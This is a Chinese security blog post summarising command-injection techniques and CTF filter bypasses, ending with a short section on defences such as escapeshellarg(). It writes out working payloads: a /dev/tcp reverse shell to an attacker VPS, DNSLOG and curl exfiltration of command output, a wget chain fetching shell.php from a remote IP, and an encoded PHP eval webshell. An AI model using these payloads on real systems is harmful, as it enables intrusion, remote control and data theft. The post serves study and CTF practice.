<!DOCTYPE html>












  


<html class="theme-next gemini use-motion" lang="zh-CN">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
























<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.7.0">

<link rel="stylesheet" href="/css/main.css?v=7.1.2">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=7.1.2">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=7.1.2">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=7.1.2">


  <link rel="mask-icon" href="/images/logo.svg?v=7.1.2" color="#222">







<script id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '7.1.2',
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false,"dimmer":false},
    back2top: true,
    back2top_sidebar: false,
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="前言最近突然想到过去遇到命令执行漏洞时无法正常写文件，权限设置为777页无济于事，同时发现过去的笔记中有关命令执行漏洞的总结较少，因此这里重新总结一次。 关于无法写文件：将当前web目录的文件所有者更改为apache：chown apache:apache html即可">
<meta name="keywords" content="web安全,命令执行漏洞">
<meta property="og:type" content="article">
<meta property="og:title" content="命令执行漏洞总结">
<meta property="og:url" content="https://songxpu.github.io/2019/08/27/命令执行漏洞总结/index.html">
<meta property="og:site_name" content="Pines404">
<meta property="og:description" content="前言最近突然想到过去遇到命令执行漏洞时无法正常写文件，权限设置为777页无济于事，同时发现过去的笔记中有关命令执行漏洞的总结较少，因此这里重新总结一次。 关于无法写文件：将当前web目录的文件所有者更改为apache：chown apache:apache html即可">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="https://songxpu.github.io/2019/08/27/命令执行漏洞总结/dnslog.jpg">
<meta property="og:image" content="https://songxpu.github.io/2019/08/27/命令执行漏洞总结/burpsuite.jpg">
<meta property="og:image" content="https://songxpu.github.io/2019/08/27/命令执行漏洞总结/phpinfo.jpg">
<meta property="og:image" content="https://songxpu.github.io/2019/08/27/命令执行漏洞总结/逃逸.jpg">
<meta property="og:updated_time" content="2019-09-17T10:36:49.463Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="命令执行漏洞总结">
<meta name="twitter:description" content="前言最近突然想到过去遇到命令执行漏洞时无法正常写文件，权限设置为777页无济于事，同时发现过去的笔记中有关命令执行漏洞的总结较少，因此这里重新总结一次。 关于无法写文件：将当前web目录的文件所有者更改为apache：chown apache:apache html即可">
<meta name="twitter:image" content="https://songxpu.github.io/2019/08/27/命令执行漏洞总结/dnslog.jpg">





  
  
  <link rel="canonical" href="https://songxpu.github.io/2019/08/27/命令执行漏洞总结/">



<script id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>命令执行漏洞总结 | Pines404</title>
  












  <noscript>
  <style>
  .use-motion .motion-element,
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-title { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Pines404</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
      
        <p class="site-subtitle">穷究于理，成就于工</p>
      
    
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
    
      
    

    
      
    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>首页</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-about">

    
    
    
      
    

    
      
    

    <a href="/about/" rel="section"><i class="menu-item-icon fa fa-fw fa-user"></i> <br>关于</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">

    
    
    
      
    

    
      
    

    <a href="/tags/" rel="section"><i class="menu-item-icon fa fa-fw fa-tags"></i> <br>标签<span class="badge">18</span></a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-categories">

    
    
    
      
    

    
      
    

    <a href="/categories/" rel="section"><i class="menu-item-icon fa fa-fw fa-th"></i> <br>分类<span class="badge">5</span></a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
    
      
    

    
      
    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>归档<span class="badge">34</span></a>

  </li>

      
      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>搜索</a>
        </li>
      
    </ul>
  

  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
            

          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://songxpu.github.io/2019/08/27/命令执行漏洞总结/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Azeroth">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Pines404">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">命令执行漏洞总结

              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              

              
                
              

              <time title="创建时间：2019-08-27 22:00:03" itemprop="dateCreated datePublished" datetime="2019-08-27T22:00:03+08:00">2019-08-27</time>
            

            
              

              
                
                <span class="post-meta-divider">|</span>
                

                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                
                  <span class="post-meta-item-text">更新于</span>
                
                <time title="修改时间：2019-09-17 18:36:49" itemprop="dateModified" datetime="2019-09-17T18:36:49+08:00">2019-09-17</time>
              
            
          </span>
		  
		  
			<span class="post-updated">
			&nbsp; | &nbsp; 更新于
			<time itemprop="dateUpdated" datetime="2019-09-17T18:36:49+08:00" content="2019-09-17">
			  2019-09-17
			</time>
		  </span>
		  


          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/categories/web安全/" itemprop="url" rel="index"><span itemprop="name">web安全</span></a></span>

                
                
              
            </span>
          

          
            
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="post-meta-item-icon">
            <i class="fa fa-eye"></i>
             阅读次数： 
            <span class="busuanzi-value" id="busuanzi_value_page_pv"></span>
            </span>
          

          
            <div class="post-symbolscount">
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">本文字数：</span>
                
                <span title="本文字数">3.5k</span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">3 分钟</span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>最近突然想到过去遇到命令执行漏洞时无法正常写文件，权限设置为777页无济于事，同时发现过去的笔记中有关命令执行漏洞的总结较少，因此这里重新总结一次。</p>
<p>关于无法写文件：将当前web目录的文件所有者更改为apache：<code>chown apache:apache html</code>即可</p>
<a id="more"></a>

<h2 id="命令执行漏洞"><a href="#命令执行漏洞" class="headerlink" title="命令执行漏洞"></a>命令执行漏洞</h2><blockquote>
<p>命令执行漏洞是指应用有时需要调用一些执行系统命令的函数，如：system()、exec()、shell_exec()、eval()、passthru()，``等函数，代码未对用户可控参数做过滤，当用户能控制这些函数中的参数时，就可以将恶意系统命令拼接到正常命令中，从而造成命令执行攻击。</p>
</blockquote>
<h3 id="命令执行几种方式"><a href="#命令执行几种方式" class="headerlink" title="命令执行几种方式"></a>命令执行几种方式</h3><table>
<thead>
<tr>
<th>函数</th>
<th>注意事项</th>
</tr>
</thead>
<tbody><tr>
<td>system()</td>
<td></td>
</tr>
<tr>
<td>passthru()</td>
<td></td>
</tr>
<tr>
<td>exec()、shell_exec()</td>
<td>无回显</td>
</tr>
<tr>
<td>反引号``</td>
<td>命令交给shell_exec()执行</td>
</tr>
<tr>
<td>popen()、proc_open()</td>
<td>无回显，返回文件指针，但命令执行了的</td>
</tr>
</tbody></table>
<p>以popen()为例：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">popen('whoami &gt;&gt;/tmp/1.txt','r');</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>查看1.txt得到结果</p>
<h2 id="命令执行绕过技巧"><a href="#命令执行绕过技巧" class="headerlink" title="命令执行绕过技巧"></a>命令执行绕过技巧</h2><h3 id="空格绕过"><a href="#空格绕过" class="headerlink" title="空格绕过"></a>空格绕过</h3><ul>
<li><p><code>&lt; 与 &lt;&gt;</code>       仅适用于文件读取等操作，例如：<code>cat&lt;flag</code></p>
</li>
<li><p><code>%09</code>   TAB的url编码</p>
</li>
<li><p><code>${IFS} $IFS$9</code>  </p>
</li>
</ul>
<blockquote>
<p>${IFS},$IFS,$IFS$9的区别，首先$IFS在linux下表示分隔符，然而本地实验却会发生这种情况，这里解释一下,单纯的cat$IFS2,bash解释器会把整个IFS2当做变量名，所以导致输不出来结果，然而如果加一个{}就固定了变量名，同理在后面加个$可以起到截断的作用，但是为什么要用$9呢，因为$9只是当前系统shell进程的第九个参数的持有者，它始终为空字符串。</p>
</blockquote>
<h3 id="命令连接符"><a href="#命令连接符" class="headerlink" title="命令连接符"></a>命令连接符</h3><table>
<thead>
<tr>
<th>分隔符</th>
<th>含义</th>
</tr>
</thead>
<tbody><tr>
<td>%0a</td>
<td>换行符</td>
</tr>
<tr>
<td>%0d</td>
<td>回车符</td>
</tr>
<tr>
<td>;</td>
<td>在Linux shell中担任连续指令[将显示所有指令结果]</td>
</tr>
<tr>
<td>&amp;</td>
<td>A&amp;B 简单拼接无制约关系。如果A为假，则B立即执行</td>
</tr>
<tr>
<td>|</td>
<td>A|B 左边输出作为右边的输入，显示B的执行结果</td>
</tr>
<tr>
<td>&amp;&amp;</td>
<td>A&amp;&amp;B 只有A执行成功，B才会执行</td>
</tr>
<tr>
<td>||</td>
<td>A||B 只有A执行失败，B才会执行</td>
</tr>
</tbody></table>
<h3 id="黑名单绕过"><a href="#黑名单绕过" class="headerlink" title="黑名单绕过"></a>黑名单绕过</h3><ul>
<li><code>${PS2}</code> 对应字符 &gt;</li>
<li><code>${PS4}</code> 对应字符 +</li>
<li><code>${9}</code> 对应 空字符串</li>
</ul>
<h4 id="变量拼接"><a href="#变量拼接" class="headerlink" title="变量拼接"></a>变量拼接</h4><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">a=l;b=s;$a$b</span><br></pre></td></tr></table></figure>

<h4 id="base64编码"><a href="#base64编码" class="headerlink" title="base64编码"></a>base64编码</h4><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">echo Y2F0IDEudHh0|base64 -d|bash</span><br><span class="line"><span class="meta">#</span><span class="bash">cat 1.txt</span></span><br></pre></td></tr></table></figure>

<h4 id="十六进制编码"><a href="#十六进制编码" class="headerlink" title="十六进制编码"></a>十六进制编码</h4><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#</span><span class="bash">编码</span></span><br><span class="line">echo "cat 1.txt"|xxd -p</span><br><span class="line"><span class="meta">#</span><span class="bash">解码</span></span><br><span class="line">echo "63617420312e7478740a"|xxd -r -p |bash</span><br><span class="line"><span class="meta">#</span><span class="bash">其他</span></span><br><span class="line"><span class="meta">$</span><span class="bash">(<span class="built_in">printf</span> <span class="string">"\154\163"</span>) ==&gt;ls</span></span><br><span class="line"><span class="meta">$</span><span class="bash">(<span class="built_in">printf</span> <span class="string">"\x63\x61\x74\x20\x66\x6c\x61\x67"</span>) ==&gt;cat flag</span></span><br><span class="line">&#123;printf,"\x63\x61\x74\x20\x66\x6c\x61\x67"&#125;|$0 ==&gt;cat /flag</span><br><span class="line"><span class="meta">#</span><span class="bash">可以通过这样来写webshell,内容为&lt;?php @<span class="built_in">eval</span>(<span class="variable">$_POST</span>[<span class="string">'c'</span>]);?&gt;</span></span><br><span class="line"><span class="meta">$</span><span class="bash">&#123;<span class="built_in">printf</span>,<span class="string">"\74\77\160\150\160\40\100\145\166\141\154\50\44\137\120\117\123\124\133\47\143\47\135\51\73\77\76"</span>&#125; &gt;&gt; 1.php</span></span><br></pre></td></tr></table></figure>

<h4 id="单、双引号"><a href="#单、双引号" class="headerlink" title="单、双引号"></a>单、双引号</h4><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ca""t fla''g</span><br></pre></td></tr></table></figure>

<h4 id="反斜线"><a href="#反斜线" class="headerlink" title="反斜线"></a>反斜线</h4><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">c\a\t f\l\a\g</span><br></pre></td></tr></table></figure>

<h4 id="利用Shell-特殊变量绕过"><a href="#利用Shell-特殊变量绕过" class="headerlink" title="利用Shell 特殊变量绕过"></a>利用Shell 特殊变量绕过</h4><table>
<thead>
<tr>
<th>变量</th>
<th>含义</th>
</tr>
</thead>
<tbody><tr>
<td>$0</td>
<td>当前脚本的文件名</td>
</tr>
<tr>
<td>$n</td>
<td>传递给脚本或函数的参数。n 是一个数字，表示第几个参数。例如，第一个参数是1，第二个参数是2。而参数不存在时其值为空。</td>
</tr>
</tbody></table>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">ca$</span><span class="bash">@t fla<span class="variable">$@g</span></span></span><br><span class="line"><span class="meta">#</span><span class="bash">cat flag</span></span><br></pre></td></tr></table></figure>

<h4 id="通配符绕过"><a href="#通配符绕过" class="headerlink" title="通配符绕过"></a>通配符绕过</h4><table>
<thead>
<tr>
<th>字符</th>
<th>解释</th>
</tr>
</thead>
<tbody><tr>
<td>*</td>
<td>匹配任意长度任意字符</td>
</tr>
<tr>
<td>？</td>
<td>匹配任意单个字符</td>
</tr>
<tr>
<td>[list]</td>
<td>匹配指定范围内(list)任意单个字符，也可以是单个字符组成的集合</td>
</tr>
<tr>
<td>{str1,str2}</td>
<td>匹配str1或者str2字符，也可以是集合</td>
</tr>
<tr>
<td>[^list]</td>
<td>匹配指定范围外的任意单个字符或字符集合</td>
</tr>
</tbody></table>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cat fl*</span><br><span class="line">cat fla?</span><br></pre></td></tr></table></figure>

<h3 id="无回显的命令执行"><a href="#无回显的命令执行" class="headerlink" title="无回显的命令执行"></a>无回显的命令执行</h3><h4 id="反弹shell"><a href="#反弹shell" class="headerlink" title="反弹shell"></a>反弹shell</h4><blockquote>
<p>此处列举的反弹shell存在局限性，一些环境下无法正常使用，之后重新总结一下反弹shell</p>
</blockquote>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">|bash -i &gt;&amp; /dev/tcp/xxxxxI(你的vps的公网ip)/8080 0&gt;&amp;1</span><br><span class="line"><span class="meta">#</span><span class="bash">远程监听</span></span><br><span class="line">nc -lvp 8080</span><br></pre></td></tr></table></figure>

<h4 id="DNSLOG"><a href="#DNSLOG" class="headerlink" title="DNSLOG"></a>DNSLOG</h4><blockquote>
<p>``中的命令实际上调用了shell_exec()函数</p>
</blockquote>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">curl http://07isyd.dnslog.cn/`whoami`</span><br><span class="line">ping `whoami`.07isyd.dnslog.cn</span><br></pre></td></tr></table></figure>

<img src="//songxpu.github.io/2019/08/27/命令执行漏洞总结/dnslog.jpg" width="500">

<h4 id="curl上传文件"><a href="#curl上传文件" class="headerlink" title="curl上传文件"></a>curl上传文件</h4><blockquote>
<p>curl -F将flag文件上传至Burpsuite中的Collaborator Client，类似于DNSLOG，但可以查看POST请求包</p>
<p>实际上也可以将flag文件上传至vps某个端口监听</p>
</blockquote>
<p><strong>打开Collaborator Client</strong>：</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">打开Burp主界面 --&gt;菜单（Burp）--&gt;Burp Collaboraor<span class="built_in"> Client </span>-- &gt; 点击 Copy <span class="keyword">to</span> Clipboard</span><br><span class="line">粘贴出来大概这样：XXXXXXXXXXXXXXXXXXXXXX.burpcollaborator.net</span><br></pre></td></tr></table></figure>

<img src="//songxpu.github.io/2019/08/27/命令执行漏洞总结/burpsuite.jpg" width="500">

<h3 id="短命令执行"><a href="#短命令执行" class="headerlink" title="短命令执行"></a>短命令执行</h3><blockquote>
<p>大体思路为将命令分割为一个个小部分，写成文件名，再通过ls写入到一个文件中并执行。</p>
<p>但利用起来发现也挺苛刻的，网上一些教程复现下来失败</p>
</blockquote>
<p><strong>复现反思</strong>：</p>
<p>直接利用<code>1&gt;1</code>这样的方式写命令是不可行的，因为执行<code>ls -t &gt; a</code>这一步会在每一个文件名的后面加一个换行符，导致无法执行。</p>
<blockquote>
<p>两个反斜杠<code>\\</code>，这种方法是利用<code>\</code>来拼接字符串，其中前一个<code>\</code>是用来转义后一个<code>\</code>的。这种方法的话需要精心构造输入，利用倒叙来输入，然后<code>ls</code>的时候需要加<code>-t</code>参数来排列一下，虽然报错了但是也执行成功了。</p>
</blockquote>
<p><strong>环境</strong>：物理机web目录index.html中写入phpinfo</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&gt;</span><span class="bash">hp</span></span><br><span class="line"><span class="meta">&gt;</span><span class="bash">ell.p\\</span></span><br><span class="line"><span class="meta">&gt;</span><span class="bash">\ sh\\</span></span><br><span class="line"><span class="meta">&gt;</span><span class="bash">\ -O\\</span></span><br><span class="line"><span class="meta">&gt;</span><span class="bash">0.117\\</span></span><br><span class="line"><span class="meta">&gt;</span><span class="bash">168.\\</span></span><br><span class="line"><span class="meta">&gt;</span><span class="bash">\ 192.\\</span></span><br><span class="line"><span class="meta">&gt;</span><span class="bash">wget\\</span></span><br><span class="line">ls -t&gt;a</span><br><span class="line">sh a</span><br></pre></td></tr></table></figure>

<p>然后生成shell.php，访问即phpinfo界面</p>
<img src="//songxpu.github.io/2019/08/27/命令执行漏洞总结/phpinfo.jpg" width="500">

<h3 id="IP绕过"><a href="#IP绕过" class="headerlink" title="IP绕过"></a>IP绕过</h3><p><a href="http://ip.chacuo.net/ipcalc" target="_blank" rel="noopener">转换网址</a> <a href="http://tool.oschina.net/hexconvert/" target="_blank" rel="noopener">进制转换</a></p>
<p>例如：<code>127.0.0.1</code> =&gt; <code>017700000001</code></p>
<p>将IP的每一位先从十进制转换为十六进制，再转为八进制，在八进制前添加一个0.</p>
<h2 id="漏洞防范"><a href="#漏洞防范" class="headerlink" title="漏洞防范"></a>漏洞防范</h2><h3 id="命令防注入函数"><a href="#命令防注入函数" class="headerlink" title="命令防注入函数"></a>命令防注入函数</h3><ol>
<li><strong>escapeshellcmd()和escapeshellarg()</strong></li>
</ol>
<ul>
<li><strong>escapeshellcmd</strong>(string $command):</li>
</ul>
<p>顾名思义，该函数是过滤整条命令的从，传入参数为命令。</p>
<p>escapeshellcmd() 对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义。 </p>
<p>反斜线（\）会在以下字符之前插入： <strong>&amp;#`;|*?~&lt;&gt;^()[]{}$, \x0A 和 \xFF</strong>，<em>’</em> 和 *”* 仅在不配对的时候被转义。</p>
<p>在Windows 平台上，所有这些字符以及 <em>%</em> 和 <em>!</em> 字符都会被<code>^</code>转义。</p>
<p>在Linux平台上，字符被反斜杠<code>\</code>转义。</p>
<ul>
<li><strong>escapeshellarg</strong>(string $command):</li>
</ul>
<p>escapeshellarg()的功能是过滤参数，将参数限制在一对双引号里，确保参数为一个字符串，它会将双引号替换为空格</p>
<p>此处想顺便写一下，这两种函数一起用的时候也存在逃逸的情况：</p>
<img src="//songxpu.github.io/2019/08/27/命令执行漏洞总结/逃逸.jpg" width="700">

<ol start="2">
<li><strong>addslashes()等过滤sql语句的函数</strong></li>
</ol>
<h3 id="参数白名单"><a href="#参数白名单" class="headerlink" title="参数白名单"></a>参数白名单</h3><p>直接在代码或配置文件中限定某些参数，使用时候匹配一下这个参数是否不再这个白名单，如果不在则直接显示错误提示。</p>
<h2 id="参考文章"><a href="#参考文章" class="headerlink" title="参考文章"></a>参考文章</h2><ol>
<li><p><a href="https://www.freebuf.com/articles/web/137923.html" target="_blank" rel="noopener">浅谈CTF中命令执行与绕过的小技巧</a></p>
</li>
<li><p><a href="http://www.admintony.com/无回显代码执行利用方法.html" target="_blank" rel="noopener">无回显代码执行利用方法</a></p>
</li>
<li><p><a href="https://chybeta.github.io/2017/08/15/命令执行的一些绕过技巧/" target="_blank" rel="noopener">命令执行的一些绕过技巧</a></p>
</li>
<li><p><a href="https://err0rzz.github.io/2017/11/13/ctf命令执行与绕过/" target="_blank" rel="noopener">ctf命令执行与绕过</a></p>
</li>
<li><p><a href="https://blog.zeddyu.info/2019/01/17/命令执行/" target="_blank" rel="noopener">巧用命令注入的N种方式</a></p>
</li>
<li><p><a href="https://cloud.tencent.com/developer/article/1148417" target="_blank" rel="noopener">PHP复杂变量绕过addslashes()直接拿shell</a></p>
</li>
<li><p><a href="https://blog.csdn.net/JBlock/article/details/88311388#Think_one_Think_792" target="_blank" rel="noopener">CTF命令执行及绕过技巧</a></p>
</li>
</ol>

      
    </div>

    

    
    
    

    

    
      
    
    

    

    <footer class="post-footer">
      
        
          
        
        <div class="post-tags">
          
            <a href="/tags/web安全/" rel="tag"># web安全</a>
          
            <a href="/tags/命令执行漏洞/" rel="tag"># 命令执行漏洞</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/08/16/windows2008_1/" rel="next" title="windows2008渗透测试（一）">
                <i class="fa fa-chevron-left"></i> windows2008渗透测试（一）
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/08/27/使用MSF进行跳板攻击/" rel="prev" title="使用MSF进行跳板">
                使用MSF进行跳板 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Azeroth</p>
              <div class="site-description motion-element" itemprop="description"></div>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">34</span>
                    <span class="site-state-item-name">日志</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  
                    
                      <a href="/categories/">
                    
                  
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">5</span>
                    <span class="site-state-item-name">分类</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-tags">
                  
                    
                      <a href="/tags/">
                    
                  
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">18</span>
                    <span class="site-state-item-name">标签</span>
                  </a>
                </div>
              
            </nav>
          

          

          

          

          

          
          

          
            
          
          

        </div>
      </div>

      
      <!--noindex-->
        <div class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#前言"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#命令执行漏洞"><span class="nav-number">2.</span> <span class="nav-text">命令执行漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#命令执行几种方式"><span class="nav-number">2.1.</span> <span class="nav-text">命令执行几种方式</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#命令执行绕过技巧"><span class="nav-number">3.</span> <span class="nav-text">命令执行绕过技巧</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#空格绕过"><span class="nav-number">3.1.</span> <span class="nav-text">空格绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#命令连接符"><span class="nav-number">3.2.</span> <span class="nav-text">命令连接符</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#黑名单绕过"><span class="nav-number">3.3.</span> <span class="nav-text">黑名单绕过</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#变量拼接"><span class="nav-number">3.3.1.</span> <span class="nav-text">变量拼接</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#base64编码"><span class="nav-number">3.3.2.</span> <span class="nav-text">base64编码</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#十六进制编码"><span class="nav-number">3.3.3.</span> <span class="nav-text">十六进制编码</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#单、双引号"><span class="nav-number">3.3.4.</span> <span class="nav-text">单、双引号</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#反斜线"><span class="nav-number">3.3.5.</span> <span class="nav-text">反斜线</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#利用Shell-特殊变量绕过"><span class="nav-number">3.3.6.</span> <span class="nav-text">利用Shell 特殊变量绕过</span></a></li><li 